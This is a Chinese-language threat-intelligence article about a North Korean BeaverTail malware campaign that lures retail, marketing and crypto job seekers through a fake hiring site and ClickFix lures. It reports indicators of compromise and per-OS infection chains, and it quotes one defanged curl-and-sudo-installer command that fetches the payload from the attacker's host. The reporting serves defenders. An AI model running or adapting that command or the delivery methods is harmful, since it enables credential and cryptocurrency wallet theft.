通过恶意仓库针对零售业组织的BeaverTail变种

一个复杂的朝鲜国家支持的威胁行为者活动已经出现，他们通过具有欺骗性的虚假招聘平台和ClickFix社会工程策略，分发BeaverTail恶意软件的升级版变种。

这场自2025年5月起开展的最新活动标志着一个重大的策略转变，威胁行为者将目标从传统的软件开发人员扩大到了营销专业人士、加密货币交易员和零售行业人员。

这种恶意软件分发基础设施以一个名为businesshire[.]top的欺诈性招聘网站为核心，该网站伪装成合法的招聘平台。

该网站提供的职位包括四家web3机构的加密货币交易员岗位，以及三家web3公司和一家美国电商零售商的销售或营销岗位。

当求职者在虚假申请过程中尝试录制必填的视频回复时，他们会遇到人为制造的技术错误，这些错误要求他们执行恶意的系统命令作为故障排除步骤。

GitLab的分析师通过基础设施分析识别出了这一活动，分析显示，截至发布时，威胁行为者托管在nvidiasdk.fly[.]dev的后端服务仍处于活跃状态。

该活动展示了显著的操作改进，包括将BeaverTail编译为独立可执行文件，而非依赖JavaScript解释器，这使得恶意软件能够在那些非技术用户的设备上运行——这些设备通常没有标准的开发工具。

威胁行为者在其整个基础设施中实施了复杂的规避机制。

该恶意服务采用动态用户代理头验证，当在没有特定数字头的情况下被访问时，会返回合法的诱饵负载。

例如，没有适当头部信息的请求会收到包含良性VisualBasic脚本和合法、已签名的英伟达广播可执行文件的压缩包，而使用“203”等头部信息的真实感染尝试则会触发实际BeaverTail有效载荷的部署。

技术感染链分析

BeaverTail的感染机制在不同操作系统间存在显著差异，这体现了威胁行为者的技术成熟度以及其对跨平台攻击的专注。

在macOS系统上，ClickFix命令通过下载一个看似合法、名为com.nvidiahpc.pkg的安装程序包来启动，该包不包含任何有效负载数据，但会执行一个恶意的预安装脚本。

该脚本试图从非标准位置~/.myvars文件中窃取存储的密码，然后从托管在/RominaMabelRamirez/dify的GitHub仓库下载额外组件。

感染链通过执行downx64.sh推进，该脚本会获取两个未签名的Mach-O二进制文件：x64nvidia（包含精简版的BeaverTail变种）和payuniversal2（InvisibleFerret的PyInstaller编译版本）。

该恶意软件展现出智能冗余机制，仅在常见安装位置未找到Python 3，或者BeaverTail执行未能在10秒内创建预期的~/.npc入口文件时，才会运行InvisibleFerret二进制文件。

curl - k - A 204 - o /var/tmp/ nvidia[.]pkg https[:]//nvidiasdk[.]fly[.]dev/nvs && 'sudo' installer - pkg /var/tmp/nvidia[.]pkg - target /

Windows系统感染遵循不同的路径，ClickFix命令会下载nvidia.tar.gz，其中包含多个组件，包括一个重命名的7zip可执行文件和一个VisualBasic启动脚本。

update.vbs脚本具有双重功能：使用硬编码密码“ppp”将受密码保护的Python依赖项提取到隐藏的.pyp目录，以及启动包含已编译BeaverTail变体的主要可执行文件nvidiasdk[.]exe。

Linux系统面临的感染途径最为直接，恶意脚本通过wget直接传输并通过管道传入bash执行。

该脚本通过nvm-sh安装程序安装Node.js，然后下载并执行BeaverTail的JavaScript版本，其功能与部署在其他平台上的编译版本完全相同。

与之前的BeaverTail迭代版本相比，该变体的复杂度有所降低，仅针对8个浏览器扩展程序，而非通常的22个，并且省去了针对Chrome以外浏览器的专用数据提取功能。

简化后的代码库将恶意软件的整体大小减少了约三分之一，同时保留了核心的凭证窃取和加密货币钱包定向攻击能力。

指挥与控制通信使用IP地址172.86.93[.]139，“tttttt”作为所有受感染系统的活动标识符。